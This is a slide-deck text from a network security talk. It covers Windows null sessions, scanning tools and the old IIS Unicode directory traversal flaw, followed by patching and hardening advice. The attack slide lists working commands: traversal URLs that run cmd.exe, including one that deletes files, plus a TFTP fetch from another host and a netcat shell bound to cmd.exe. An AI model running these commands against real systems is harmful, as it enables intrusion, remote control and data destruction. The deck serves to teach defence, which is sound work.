Expose the Vulnerability

Paul Hogan

Ward Solutions

Session Prerequisites

Hands-on experience with Windows 2000 or Windows Server 2003

Working knowledge of networking, including basics of security

Basic knowledge of network security-assessment strategies

Level 300

Anatomy of a Hack

Information Gathering / Profiling

nslookup, whois

Probe / Enumerating

Superscan, nmap, nessus, nikto, banner grabbing, OS fingerprinting

Attack

Unicode directory traversal

Advancement

Entrenchment

Infiltration/Extraction

nslookup

RIPE Whois

superscan

Simple Command Line Utilities

net view \\172.16.10.5

net use \\172.16.10.5

net use \\172.16.10.5 "" /u:"" red button vulnerability

net view \\172.16.10.5

nbtstat -A 172.16.10.5

nbtscan -r 172.16.10.0/24

net use \\172.16.10.5 "" /u:guest

nmap nessus

nikto

Overview

Name: Microsoft IIS 4.0/5.0 Extended Unicode Directory Traversal Vulnerability. (BugTraq ID 1806)

Operating System: Windows NT 4.0 (+ IIS 4.0) and Windows 2000 (+ IIS 5.0).

Brief Description: A particular type of malformed URL could be used to access files and directories beyond the web folders. This would potentially enable a malicious user to gain privileges commensurate with those of a locally logged-on users. Gaining these permissions would enable the malicious user to add, change or delete data, run code already on the server, or upload new code to the server and run it.

Impacts

If the E-business web server was compromised, the backend database sever is under threat too. Trust relationship. Same passwords. Database connection pools. Use web server and database server as a relay to connect the outside machine with the internal machines. Then firewall is circumvented……

If the compromised web server is a site for software distribution, add Trojans or Zombie codes to the downloadable software, then you can control all the machines which download software from that website…..

Solutions

Install patches as soon as possible

Patch Management: SMS/SUS/MBSA

Disable NetBIOS over TCP/IP.

Be sure that the IUSR_machinename account does not have write access to any files on the server.

Unicode Directory Traversal Attack

http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\+/s

http://172.16.10.5/scripts/..%c0%af../winnt/system32/cmd.exe?/c+del+c:\*.*

perl -x unicodexecute.pl 172.16.10.5:80 dir

perl -x unicodexecute.pl 172.16.10.5:80 tftp -i 172.10.10.21 GET *.*

perl -x unicodexecute.pl 172.16.10.5:80 nc -L –p555 -d -e cmd.exe

c:\nc 192.168.1.2 443

How To Get Your Network Hacked In 10 Easy Steps

1. Don’t patch anything2. Run unhardened applications3. Logon everywhere as a domain admin4. Open lots of holes in the firewall5. Allow unrestricted internal traffic6. Allow all outbound traffic7. Don’t harden servers8. Use lame passwords9. Use high-level service accounts, in multiple places10. Assume everything is OK

The moral

Initial entry is everything

Most networks are designed like egg shells

Hard and crunchy on the outside

Soft and chewy on the inside

Once an attacker is inside the network you can…

Update resume

Hope he does a good job running it

Drain the network